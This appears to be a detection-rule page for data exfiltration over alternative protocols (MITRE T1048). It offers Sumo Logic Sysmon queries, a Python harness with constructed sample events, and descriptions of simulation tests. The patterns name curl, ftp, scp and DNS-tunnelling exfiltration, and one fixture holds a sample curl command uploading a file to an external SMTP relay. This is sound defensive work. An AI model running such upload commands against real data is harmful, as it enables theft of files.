T1048 Sumo Logic CSE · Sumo

Detect Exfiltration Over Alternative Protocol in Sumo Logic CSE

Adversaries may steal data by exfiltrating it over a different protocol than that used for command and control. Data may be sent over FTP, SMTP, DNS, SMB, HTTP/S, or any other network protocol not serving as the primary C2 channel. Adversaries often encrypt or obfuscate these alternate channels. Common tools include curl, ftp.exe, WinSCP, and built-in OS utilities. DNS tunneling (encoding data in DNS query subdomains) is a particularly stealthy variant used by malware families like FrameworkPOS. IaaS and SaaS platforms (Exchange, SharePoint, GitHub, AWS S3) can also serve as exfiltration endpoints via cloud APIs or direct downloads.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1048 Exfiltration Over Alternative Protocol
Canonical reference
https://attack.mitre.org/techniques/T1048/

Sumo Detection Query

Sumo Logic CSE (Sumo)
// Branch 1: Exfil tool with upload indicators (Sysmon Event ID 1)
_sourceCategory=windows/sysmon ("EventID=1" OR "<EventID>1</EventID>")
| parse "<EventID>*</EventID>" as EventID
| parse "<Image>*</Image>" as Image
| parse "<CommandLine>*</CommandLine>" as CommandLine
| parse "<ParentImage>*</ParentImage>" as ParentImage
| parse "<User>*</User>" as User
| parse "<Computer>*</Computer>" as Computer
// the keyword scope above is only a coarse filter; pin the exact event ID after parsing
| where EventID = "1"
| where (
    Image matches "*ftp.exe" OR Image matches "*curl.exe" OR Image matches "*winscp.exe"
    OR Image matches "*pscp.exe" OR Image matches "*sftp.exe" OR Image matches "*bitsadmin.exe"
    OR Image matches "*robocopy.exe" OR Image matches "*wget.exe"
  )
| where (
    CommandLine matches "* -T *" OR CommandLine matches "*--upload-file*" OR CommandLine matches "* PUT *"
    OR CommandLine matches "*ftp://*" OR CommandLine matches "*sftp://*" OR CommandLine matches "*ftps://*"
    OR CommandLine matches "*smtp://*" OR CommandLine matches "*--mail-from*" OR CommandLine matches "*--mail-rcpt*"
    OR CommandLine matches "* -F *" OR CommandLine matches "*--form*"
  )
| fields _messagetime, Computer, User, Image, CommandLine, ParentImage
| concat("ExfilToolUpload") as DetectionBranch

// Branch 2: Outbound network connections on exfil ports (Sysmon Event ID 3)
// Run as a separate search:
_sourceCategory=windows/sysmon ("EventID=3" OR "<EventID>3</EventID>")
| parse "<EventID>*</EventID>" as EventID
| parse "<DestinationIp>*</DestinationIp>" as DestinationIp
| parse "<DestinationPort>*</DestinationPort>" as DestinationPort
| parse "<Image>*</Image>" as Image
| parse "<User>*</User>" as User
| parse "<Computer>*</Computer>" as Computer
| where EventID = "3"
| where DestinationPort in ("21","22","25","465","587","989","990","2121","2222")
// matches takes wildcards only, so a pattern like "172.1[6-9].*" is a literal string and never
// matches; isPrivateIP() covers the RFC 1918 ranges (10/8, 172.16/12, 192.168/16) and loopback
// is excluded by prefix
| where !isPrivateIP(DestinationIp)
| where !(DestinationIp matches "127.*")
| where !( Image matches "*svchost.exe" OR Image matches "*lsass.exe" OR Image matches "*Outlook.exe" OR Image matches "*thunderbird.exe" OR Image matches "*filezilla.exe")
| timeslice 1h
| count as Connections by Computer, User, Image, DestinationIp, DestinationPort, _timeslice
| where Connections > 5
| concat("SuspiciousOutboundPort") as DetectionBranch

// Branch 3: DNS tunneling — long DNS query names (Sysmon Event ID 22)
// Run as a separate search:
_sourceCategory=windows/sysmon ("EventID=22" OR "<EventID>22</EventID>")
| parse "<EventID>*</EventID>" as EventID
| parse "<QueryName>*</QueryName>" as QueryName
| parse "<Image>*</Image>" as Image
| parse "<User>*</User>" as User
| parse "<Computer>*</Computer>" as Computer
| where EventID = "22"
// compute the length once as a field; aggregates take a field name, not a nested expression
| length(QueryName) as QueryLen
| where QueryLen > 50
| where !( QueryName matches "*.microsoft.com" OR QueryName matches "*.windows.com" OR QueryName matches "*.google.com" OR QueryName matches "*.amazon.com" OR QueryName matches "*.cloudfront.net")
| timeslice 1h
| count as DNSQueryCount, max(QueryLen) as MaxQueryLen by Computer, User, Image, _timeslice
| where DNSQueryCount > 20 OR MaxQueryLen > 100
| concat("DNSTunnelingSuspect") as DetectionBranch
Severity: high. Confidence: medium.

Three-branch Sumo Logic detection for exfiltration over alternative protocols using Sysmon XML event parsing. Branch 1 targets known exfil tools with upload command-line indicators. Branch 2 detects outbound connections to exfil-relevant ports from non-standard processes. Branch 3 identifies DNS tunneling via long query names or high DNS query volume.
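To check the branch logic against events before live Sysmon telemetry is flowing, here is an added example (not code from this page or from Sumo Logic): a Python re-implementation of the three branches, with their thresholds as parameters, run over constructed Sysmon-style events. The events use the <Field>value</Field> layout that the parse statements above assume; the hostname WS01, user CORP\alice, the 203.0.113.x addresses, the temp-directory binary and the exfil-test.invalid domain are all placeholders. The internal-range check is written as explicit RFC 1918 plus loopback membership, which is what the query's prefix exclusions express; 198.51.100.1 from Test 5 is therefore external here, which is why the example does not use ipaddress's broader is_private flag.

```python
import ipaddress
import re
from collections import defaultdict

def make_event(event_id, **fields):
    """Constructed event in the <Field>value</Field> layout the page's parse statements assume."""
    body = "".join(f"<{k}>{v}</{k}>" for k, v in fields.items())
    return f"<Event><EventID>{event_id}</EventID>{body}</Event>"

def field(event, name):
    """Equivalent of: parse "<Name>*</Name>" as Name (empty string if the tag is absent)."""
    m = re.search(rf"<{name}>(.*?)</{name}>", event, re.S)
    return m.group(1) if m else ""

def hour(event):
    """Equivalent of: timeslice 1h, using the 'YYYY-MM-DD HH' prefix of Sysmon's UtcTime."""
    return field(event, "UtcTime")[:13]

EXFIL_IMAGES = ("ftp.exe", "curl.exe", "winscp.exe", "pscp.exe", "sftp.exe", "bitsadmin.exe", "robocopy.exe", "wget.exe")
UPLOAD_INDICATORS = (" -T ", "--upload-file", " PUT ", "ftp://", "sftp://", "ftps://",
                     "smtp://", "--mail-from", "--mail-rcpt", " -F ", "--form")
EXFIL_PORTS = {"21", "22", "25", "465", "587", "989", "990", "2121", "2222"}
PORT_EXCLUDED_IMAGES = ("svchost.exe", "lsass.exe", "outlook.exe", "thunderbird.exe", "filezilla.exe")
DNS_ALLOWLIST = (".microsoft.com", ".windows.com", ".google.com", ".amazon.com", ".cloudfront.net")
# RFC 1918 plus loopback: the prefixes the query excludes. 198.51.100.1 (Test 5) is deliberately not here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def is_internal(ip):
    try:
        return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)
    except ValueError:  # an unparsable DestinationIp is treated as external, as the query would
        return False

def branch1_exfil_tool_upload(events):
    """Sysmon EID 1: known transfer tool plus an upload-style argument on the command line."""
    hits = []
    for e in events:
        image, cmd = field(e, "Image"), field(e, "CommandLine")
        if field(e, "EventID") == "1" and image.lower().endswith(EXFIL_IMAGES) \
                and any(ind in cmd for ind in UPLOAD_INDICATORS):
            hits.append((field(e, "Computer"), field(e, "User"), image, cmd))
    return hits

def branch2_suspicious_outbound_port(events, min_connections=5):
    """Sysmon EID 3: more than min_connections per hour to an exfil port on a non-internal address."""
    counts = defaultdict(int)
    for e in events:
        ip, port, image = field(e, "DestinationIp"), field(e, "DestinationPort"), field(e, "Image")
        if field(e, "EventID") != "3" or port not in EXFIL_PORTS or is_internal(ip) \
                or image.lower().endswith(PORT_EXCLUDED_IMAGES):
            continue
        counts[(field(e, "Computer"), field(e, "User"), image, ip, port, hour(e))] += 1
    return {k: n for k, n in counts.items() if n > min_connections}

def branch3_dns_tunneling(events, min_len=50, min_count=20, max_len=100):
    """Sysmon EID 22: long, non-allowlisted query names aggregated per process per hour."""
    agg = defaultdict(lambda: [0, 0])  # key -> [query count, longest query name]
    for e in events:
        qname = field(e, "QueryName")
        if field(e, "EventID") != "22" or len(qname) <= min_len or qname.lower().endswith(DNS_ALLOWLIST):
            continue
        key = (field(e, "Computer"), field(e, "User"), field(e, "Image"), hour(e))
        agg[key][0] += 1
        agg[key][1] = max(agg[key][1], len(qname))
    return {k: (n, longest) for k, (n, longest) in agg.items() if n > min_count or longest > max_len}

# Constructed sample telemetry: hostnames, users, 203.0.113.x addresses and exfil-test.invalid are placeholders.
BASE = dict(Computer="WS01", User="CORP\\alice", UtcTime="2024-03-01 10:05:00.000")
TMP_EXE = r"C:\Users\alice\AppData\Local\Temp\upd.exe"
CURL, CMD = r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe"
LABEL = "a" * 70  # stands in for one base64 chunk of tunnelled data
SAMPLE_EVENTS = [
    # fires: curl pushing a file to an external SMTP relay (same shape as Test 2)
    make_event(1, Image=CURL, ParentImage=CMD, CommandLine=r"curl.exe --upload-file C:\Users\alice\q1.zip "
               r"smtp://203.0.113.5 --mail-from a@x.test --mail-rcpt b@y.test", **BASE),
    # silent: curl with no upload indicator
    make_event(1, Image=CURL, ParentImage=CMD, CommandLine="curl.exe -s https://api.example.test/health", **BASE),
    # silent: ftp:// on the command line, but the image is not a transfer tool
    make_event(1, Image=r"C:\Windows\System32\notepad.exe", ParentImage=CMD, CommandLine="notepad.exe ftp://x.txt", **BASE),
]
# fires: six SSH connections in one hour from a temp-dir binary to an external host
SAMPLE_EVENTS += [make_event(3, Image=TMP_EXE, DestinationIp="203.0.113.7", DestinationPort="22", **BASE) for _ in range(6)]
# silent: the same volume to an RFC 1918 address, and Outlook using SMTP submission
SAMPLE_EVENTS += [make_event(3, Image=TMP_EXE, DestinationIp="172.20.4.9", DestinationPort="22", **BASE) for _ in range(6)]
SAMPLE_EVENTS += [make_event(3, Image=r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                             DestinationIp="203.0.113.9", DestinationPort="587", **BASE) for _ in range(6)]
# fires on MaxQueryLen: three 161-character names under a constructed tunnel domain (same shape as Test 3)
SAMPLE_EVENTS += [make_event(22, Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                             QueryName=f"{LABEL}{i}.{LABEL}.exfil-test.invalid", **BASE) for i in range(3)]
# silent: long but allowlisted CDN hostname
SAMPLE_EVENTS.append(make_event(22, Image=r"C:\Program Files\Sync\sync.exe", QueryName="d" * 60 + ".cloudfront.net", **BASE))

def run_all(events=None):
    """Run the three branches; returns {DetectionBranch: hits}."""
    events = SAMPLE_EVENTS if events is None else events
    return {"ExfilToolUpload": branch1_exfil_tool_upload(events),
            "SuspiciousOutboundPort": branch2_suspicious_outbound_port(events),
            "DNSTunnelingSuspect": branch3_dns_tunneling(events)}

if __name__ == "__main__":
    for branch, hits in run_all().items():
        print(f"{branch}: {len(hits)} hit(s)")
```

Each branch returns its hits keyed the same way the query groups them, so raising min_connections to 6 silences the Branch 2 sample, and the allowlisted CDN name and the RFC 1918 destination never reach the aggregation, which is the behaviour the tuning notes below describe.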

Data Sources

Sumo Logic Installed Collector with a Windows Event Log Source subscribed to the Microsoft-Windows-Sysmon/Operational channel. The parse statements expect each Sysmon field as its own tag (for example <Image>...</Image>), so confirm against a sample raw message that the source's event format produces that shape before deploying.

Required Tables

_sourceCategory=windows/sysmon

False Positives & Tuning

  • Legitimate use of curl or wget by developers testing API endpoints with POST/PUT methods — add a process parent filter to exclude IDEs and terminals used by known developer accounts
  • Robocopy jobs replicating data to file shares: robocopy is in the Branch 1 image list, so exclude the service accounts and destination paths of scheduled copy jobs. SMB (TCP 445) is deliberately absent from the Branch 2 port list; add it only if your environment needs it and expect a high baseline of legitimate connections
  • Cloud sync clients with long hostname CDN endpoints triggering the DNS query length threshold — maintain a domain allowlist and tune the 50-char threshold based on baseline DNS telemetry

Testing Methodology

Validate this detection with the five Atomic Red Team style tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: FTP Upload via Windows Built-in FTP Client

    Expected signal: Sysmon Event ID 1: Process Create with Image=ftp.exe, CommandLine containing '-s:%TEMP%\df00tech-ftp.txt'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:21 from ftp.exe. Sysmon Event ID 11: File create for the ftp script file in TEMP.

  2. Test 2: curl SMTP Exfiltration Simulation

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '--mail-from', '--mail-rcpt', '--upload-file', 'smtp://'. Sysmon Event ID 3: Network Connection to 127.0.0.1:25 from curl.exe. The connection will fail but telemetry events fire.

  3. Test 3: DNS Tunneling Simulation via Long Subdomain Queries

    Expected signal: Sysmon Event ID 22 (DNS Query): 25 events with QueryName containing long base64-encoded subdomains (>50 characters) under df00tech-test.com. DNS queries will fail to resolve (NXDOMAIN) but the DNS telemetry events are generated by the Sysmon DNS query logging provider.

  4. Test 4: curl Upload via HTTP PUT (Alternative Protocol Exfiltration)

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '-X PUT', '-T', and 'http://127.0.0.1:8888'. Sysmon Event ID 3: Network Connection to 127.0.0.1:8888. Sysmon Event ID 11: File Create for exfil_test.txt in TEMP directory.

  5. Test 5: SCP File Exfiltration via OpenSSH (Linux/macOS)

    Expected signal: Auditd EXECVE record for scp with arguments including the destination host and port. Network connection event to 198.51.100.1:22. On systems with Sysmon for Linux: Process Create event (EventCode=1) for the scp binary, Network Connect (EventCode=3) for the outbound SSH connection attempt. Note that the query above is scoped to _sourceCategory=windows/sysmon, so this test exercises telemetry collection on Linux/macOS rather than the detection as written; extend the source category or port the branches to your Linux log source before expecting an alert.
